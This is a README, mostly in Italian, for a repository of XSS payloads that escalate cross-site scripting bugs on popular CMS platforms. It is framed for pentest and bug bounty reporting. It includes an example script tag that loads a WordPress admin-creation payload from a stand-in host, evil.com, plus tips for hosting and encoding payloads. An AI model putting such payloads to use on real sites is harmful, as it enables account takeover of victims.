
XSS payloads designed to turn alert(1) into P1
Payload XSS progettati per trasformare alert(1) in P1.
Questa repo è stata rilasciata insieme a un post del blog intitolato "Come Elevare i Tuoi Bug XSS da Medium a Critical" https://medium.com/@hakluke/upgrade-xss-from-medium-to-critical-cb96597b6cc4
In questo repository troverai una serie di file JavaScript che possono essere caricati in un payload XSS per eseguire funzioni sensibili su piattaforme CMS popolari nel contesto del browser della vittima. Questo può aiutare a concatenare un comune bug XSS in qualcosa di più critico, come il furto dell'account.
Questo è perfetto per aumentare la gravità di un pentest o di un report di bug bounty dimostrando un reale impatto sulla sicurezza.
I payload vengono aggiunti lentamente, man mano che ho tempo. Ce ne sono molti altri in arrivo; se puoi dare una mano, le pull request sono benvenute! Se stai cercando ispirazione su cosa creare, controlla la scheda "issues" di questa repo.
Il modo più semplice per usare questi payload è ospitarli da qualche parte e caricarli nell'attributo src di un tag script per il tuo payload XSS, in questo modo:
<script src="http://evil.com/wordpress_create_admin_user.js"></script>
In alternativa, a seconda del contesto e della lunghezza del payload, a volte può essere minificato, codificato e poi incluso direttamente nella richiesta.
Per ospitare il file JavaScript, potresti dover impostare il Content-Type su application/javascript. Per farlo con PHP, puoi semplicemente anteporre questa riga a uno qualsiasi dei payload, salvarlo come file .php e ospitarlo sul tuo server web con PHP abilitato:
<?php header("Content-Type: application/javascript"); ?>
Questo articolo di Shift8 è ciò che mi ha ispirato a creare questa repo. Il JS nell'articolo ha un paio di refusi minori, ma i concetti sono azzeccati.